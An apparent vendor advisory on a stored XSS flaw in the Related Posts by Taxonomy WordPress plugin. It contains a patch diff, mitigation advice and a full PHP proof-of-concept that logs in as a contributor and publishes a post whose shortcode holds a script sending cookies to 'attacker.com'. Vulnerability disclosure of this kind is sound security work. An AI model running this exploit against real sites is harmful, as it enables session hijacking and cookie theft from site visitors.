Atomic Edge analysis of CVE-2026-0916:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Related Posts by Taxonomy WordPress plugin. The vulnerability affects the plugin’s ‘related_posts_by_tax’ shortcode, allowing attackers with contributor-level or higher privileges to inject malicious scripts. These scripts execute when a user views a page containing the compromised shortcode.
The root cause is insufficient input sanitization and output escaping for user-supplied shortcode attributes. The vulnerable code resides in the `related_posts_by_taxonomy` function within `/includes/functions.php`. Prior to the patch, this function directly output user-controlled arguments from the `$rpbt_args` array (lines 258-261) without proper escaping. The function concatenated values for ‘before’, ‘after’, ‘title’, and ‘post_class’ parameters directly into the final HTML output.
Exploitation requires an authenticated attacker with at least contributor-level access to create or edit a post. The attacker embeds the `[related_posts_by_tax]` shortcode with malicious JavaScript payloads within its attributes. For example, an attacker could use `[related_posts_by_tax title=”alert(document.domain)”]`. When the post is saved and subsequently viewed, the browser executes the injected script in the context of the victim’s session.
The patch introduces a centralized HTML sanitization function, `km_rpbt_kses_allowed_html()`, defined in `/includes/settings.php`. This function returns an array of allowed HTML tags and attributes, building upon `wp_kses_allowed_html(‘post’)` and adding specific allowances for `
Successful exploitation leads to stored XSS. Attackers can steal session cookies, perform actions on behalf of authenticated users, deface websites, or redirect users to malicious sites. The impact is limited to the context of users who view the compromised page, but with a CVSS score of 6.4, it represents a significant risk to site integrity and user security.
Differential between vulnerable and patched code
Code Diff
--- a/related-posts-by-taxonomy/includes/class-rest-api.php
+++ b/related-posts-by-taxonomy/includes/class-rest-api.php
@@ -186,14 +186,7 @@
* @return string Sanitized HTML.
*/
public function sanitize_response_html( $html ) {
- $tags = wp_kses_allowed_html( 'post' );
-
- // For show date
- $tags['time'] = array(
- 'datetime' => true,
- 'class' => true,
- );
-
+ $tags = km_rpbt_kses_allowed_html();
$html = wp_kses( $html, $tags );
return $html ? $html : '';
}
--- a/related-posts-by-taxonomy/includes/functions.php
+++ b/related-posts-by-taxonomy/includes/functions.php
@@ -261,7 +261,20 @@
$html .= isset( $rpbt_args[ $after ] ) ? $rpbt_args[ $after ] . "n" : '';
}
+ /**
+ * Filters Disallowed tags (<scipt> etc...) out of html output by default.
+ *
+ * @since 2.7.7
+ *
+ * @return boolean Srips disallowed html from output if true
+ */
+ if ( apply_filters( 'related_posts_by_taxonomy_strip_disallowed_html', true, $rpbt_args ) ) {
+ // Html is filtered by default to only return allowed HTML.
+ $html = wp_kses( $html, km_rpbt_kses_allowed_html() );
+ }
+
$recursing = false;
+
return trim( $html );
}
--- a/related-posts-by-taxonomy/includes/settings.php
+++ b/related-posts-by-taxonomy/includes/settings.php
@@ -363,3 +363,36 @@
}
return $args;
}
+
+/**
+ * Returns all valid tags in html returned by this plugin.
+ *
+ * @since 2.7.7
+ *
+ * @return array Array with validated boolean values
+ */
+function km_rpbt_kses_allowed_html() {
+ $tags = wp_kses_allowed_html( 'post' );
+
+ if ( ! isset( $tags['time'] ) || ! is_array( $tags['time'] ) ) {
+ $tags['time'] = array();
+ }
+ $tags['time']['datetime'] = true;
+ $tags['time']['class'] = true;
+
+ if ( ! isset( $tags['img'] ) || ! is_array( $tags['img'] ) ) {
+ $tags['img'] = array();
+ }
+ $tags['img']['srcset'] = true;
+ $tags['img']['decoding'] = true;
+ $tags['img']['sizes'] = true;
+
+ /**
+ * Valid tags used for kses.
+ *
+ * @since 2.7.7
+ *
+ * @return array Array with allowed html tags
+ */
+ return apply_filters( 'related_posts_by_taxonomy_kses_allowed_html', $tags );
+}
--- a/related-posts-by-taxonomy/related-posts-by-taxonomy.php
+++ b/related-posts-by-taxonomy/related-posts-by-taxonomy.php
@@ -1,7 +1,7 @@
<?php
/**
* Plugin Name: Related Posts By Taxonomy
- * Version: 2.7.6
+ * Version: 2.7.7
* Plugin URI: http://keesiemeijer.wordpress.com/related-posts-by-taxonomy/
* Description: Display related posts as thumbnails, links, excerpts or as full posts with a widget or shortcode. Posts with the most terms in common will display at the top.
* Author: keesiemijer
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0916 - Related Posts by Taxonomy <= 2.7.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'related_posts_by_tax' Shortcode
<?php
$target_url = 'http://vulnerable-wordpress-site.local/wp-admin/post.php';
$username = 'contributor';
$password = 'password';
// Payload: Inject a script that steals the user's cookies.
$malicious_title = '<script>fetch("https://attacker.com/steal?c=" + document.cookie);</script>';
$shortcode = '[related_posts_by_tax title="' . $malicious_title . '"]';
// Create a new post with the malicious shortcode.
$post_data = [
'post_title' => 'Test Post with XSS',
'post_content' => 'This post contains an exploited shortcode. ' . $shortcode,
'post_status' => 'publish',
'post_type' => 'post'
];
// Initialize cURL session for login and cookie handling.
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Step 1: Get the login page to retrieve the nonce.
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.local/wp-login.php');
$login_page = curl_exec($ch);
preg_match('/name="log"[^>]+value="([^"]*)"?/', $login_page, $log_match);
$log = $log_match[1] ?? '';
preg_match('/name="pwd"[^>]+value="([^"]*)"?/', $login_page, $pwd_match);
$pwd = $pwd_match[1] ?? '';
preg_match('/name="wp-submit"[^>]+value="([^"]*)"?/', $login_page, $submit_match);
$wp_submit = $submit_match[1] ?? 'Log In';
// Step 2: Perform the login POST.
$login_post_data = http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => $wp_submit,
'redirect_to' => 'http://vulnerable-wordpress-site.local/wp-admin/',
'testcookie' => '1'
]);
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.local/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_post_data);
$login_response = curl_exec($ch);
// Step 3: Create a new post with the malicious shortcode.
// First, get the post creation page to retrieve the nonce (_wpnonce).
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.local/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$post_new_page = curl_exec($ch);
preg_match('/name="_wpnonce" value="([^"]+)"/', $post_new_page, $nonce_match);
$wpnonce = $nonce_match[1] ?? '';
// Build the POST data for creating the post.
$create_post_data = http_build_query(array_merge($post_data, [
'_wpnonce' => $wpnonce,
'_wp_http_referer' => '/wp-admin/post-new.php',
'action' => 'editpost',
'post_type' => 'post',
'user_ID' => '1', // Adjust if needed
'meta-box-order-nonce' => $wpnonce,
'closedpostboxesnonce' => $wpnonce,
'samplepermalinknonce' => $wpnonce
]));
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $create_post_data);
$create_response = curl_exec($ch);
// Check for success.
if (strpos($create_response, 'Post published.') !== false || strpos($create_response, 'Post updated.') !== false) {
echo "[+] Malicious post created successfully. The XSS payload will execute when the post is viewed.n";
// Extract the post ID from the response for demonstration.
preg_match('/post=([0-9]+)/', $create_response, $post_id_match);
if (!empty($post_id_match[1])) {
$post_id = $post_id_match[1];
echo "[+] Post ID: $post_id. View at: http://vulnerable-wordpress-site.local/?p=$post_idn";
}
} else {
echo "[-] Post creation may have failed. Check authentication and permissions.n";
}
curl_close($ch);
?>
Frequently Asked Questions
What is CVE-2026-0916?
Overview of the vulnerability
CVE-2026-0916 is a stored cross-site scripting (XSS) vulnerability found in the Related Posts by Taxonomy plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘related_posts_by_tax’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s handling of user-supplied attributes. An attacker can embed a malicious script in the shortcode attributes, which executes when a user views the affected post.
Who is affected by this vulnerability?
Identifying vulnerable installations
All versions of the Related Posts by Taxonomy plugin up to and including 2.7.6 are affected. To check if your site is vulnerable, verify the plugin version in your WordPress admin dashboard and look for any posts using the ‘related_posts_by_tax’ shortcode.
How can I fix or mitigate this vulnerability?
Updating the plugin
The vulnerability has been patched in version 2.7.7 of the Related Posts by Taxonomy plugin. It is recommended to update the plugin immediately to the latest version to eliminate the risk.
What is the risk level of CVE-2026-0916?
Understanding the CVSS score
CVE-2026-0916 has a CVSS score of 6.4, indicating a medium severity risk. This means that while the vulnerability requires authenticated access to exploit, it can still lead to significant security issues, including session hijacking and data theft.
What are the practical implications of this vulnerability?
Potential impact on users
If exploited, this vulnerability can allow attackers to execute arbitrary scripts in the context of a user’s session. This could lead to stolen session cookies, unauthorized actions on behalf of users, or redirection to malicious sites.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept shows how an attacker can create a post containing the malicious shortcode, which includes a script to steal cookies. When another user views the post, the script executes, demonstrating the stored XSS vulnerability.
What steps should I take if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the plugin until it can be updated. Additionally, review user roles and permissions to limit access to only trusted users.
What should I do if I suspect my site has been compromised?
Response to exploitation
If you suspect exploitation, immediately change all user passwords, review user activity logs, and remove any unauthorized posts or scripts. Conduct a full security audit to assess the extent of the compromise.
Where can I find more information on this vulnerability?
Resources for further reading
You can refer to the official CVE database for CVE-2026-0916, as well as security advisories from WordPress and the plugin developer. Security blogs and forums may also provide insights and updates.
How does this vulnerability compare to other XSS vulnerabilities?
Contextualizing the risk
While CVE-2026-0916 is a medium severity XSS vulnerability, the risk level can vary based on the specific context of the site and the privileges of the attackers. It is crucial to assess all XSS vulnerabilities in relation to their potential impact on your specific environment.
What are the best practices to prevent similar vulnerabilities?
Enhancing WordPress security
To prevent similar vulnerabilities, ensure all plugins and themes are regularly updated, implement strict user role management, and utilize security plugins that provide input validation and sanitization features.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
